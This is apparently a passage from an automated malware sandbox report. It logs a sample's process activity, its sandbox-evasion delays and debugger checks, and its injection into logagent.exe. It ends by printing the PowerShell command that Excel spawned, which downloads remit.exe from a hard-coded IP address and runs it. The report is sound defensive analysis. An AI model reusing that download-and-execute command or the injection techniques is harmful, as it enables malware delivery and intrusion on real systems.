Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Delayed program exit found

Show sources

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0040D0B5 Sleep,ExitProcess,

24_2_0040D0B5

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4316	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6648	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\logagent.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

24_2_004160DB

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1781			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1015			Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\
Source: C:\Windows\SysWOW64\logagent.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
Source: C:\Windows\SysWOW64\logagent.exe	File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

24_2_0040697D

Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\logagent.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Source: powershell.exe, 00000004.00000002.314035210.000000000591D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: logagent.exe, 00000026.00000002.412653096.0000000002EBA000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\<.oeaccountx
Source: explorer.exe, 00000013.00000002.501863579.00000000007D4000.00000004.00000020.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b&
Source: powershell.exe, 00000004.00000002.314035210.000000000591D000.00000004.00000001.sdmp	Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: Srakjle.exe, 00000027.00000003.437818449.00000000006FD000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWM
Source: logagent.exe, 00000026.00000002.412653096.0000000002EBA000.00000004.00000020.sdmp	Binary or memory string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V\.
Source: Srakjle.exe, 00000027.00000003.437818449.00000000006FD000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: logagent.exe, 00000018.00000002.454181180.00000000031E7000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(
Source: logagent.exe, 00000026.00000002.412653096.0000000002EBA000.00000004.00000020.sdmp	Binary or memory string: WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\*.oeaccountbaw)9h
Source: bhvDE1F.tmp.36.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:472DC600-FEAB-E7F8-720D-1E33F00FD1E7&ctry=US&time=20210922T043338Z&lc=en-US&pl=en-US&idtp=mid&uid=4388269c-b420-4134-ac19-bc7ca8a19ac1&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=4737a9ff108b48309f186bad7ebea2ac&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1177153&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1177153&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: logagent.exe, 00000026.00000002.412653096.0000000002EBA000.00000004.00000020.sdmp	Binary or memory string: WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	24_2_0040A012
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004061C3 FindFirstFileW,FindNextFileW,	24_2_004061C3
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_0040A22D
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,	24_2_004153F5
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,	24_2_00417754
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_004077EC
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00446AF9 FindFirstFileExA,	24_2_00446AF9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00407C55 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_00407C55

Source: C:\Windows\SysWOW64\logagent.exe

24_2_0040CD09

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0043CB4E mov eax, dword ptr fs:[00000030h]

24_2_0043CB4E

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

24_2_0042F727

Source: C:\Windows\SysWOW64\logagent.exe

Code function: 24_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,

24_2_0040F15D

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Process token adjusted: Debug

Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0042F8B9 SetUnhandledExceptionFilter,	24_2_0042F8B9
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_0042F727
Source: C:\Windows\SysWOW64\logagent.exe	Code function: 24_2_00436793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00436793

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Windows\SysWOW64\logagent.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5A	Jump to behavior

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\logagent.exe

24_2_0041412B

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Users\Public\filesvr.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2CC0000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2D80000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2D00000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 2D20000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 180000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 240000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Thread created: C:\Windows\SysWOW64\logagent.exe EIP: 1C0000	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2CC0000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2D50000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2D60000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2D70000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2D80000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2CD0000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2CE0000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2CF0000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2D00000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2D10000	Jump to behavior
Source: C:\Users\Public\filesvr.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 2D20000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 180000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 210000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 220000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 230000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 240000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 190000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 1A0000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 1B0000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 1C0000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 10590000	Jump to behavior
Source: C:\Users\Public\Libraries\Srakjle\Srakjle.exe	Memory written: C:\Windows\SysWOW64\logagent.exe base: 1D0000	Jump to behavior

Source: C:\Windows\SysWOW64\logagent.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe

24_2_0040FAC7

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://192.210.214.221/remit.exe -OutFile $env:public\filesvr.exe;explorer $env:public\filesvr.exe			Jump to behavior

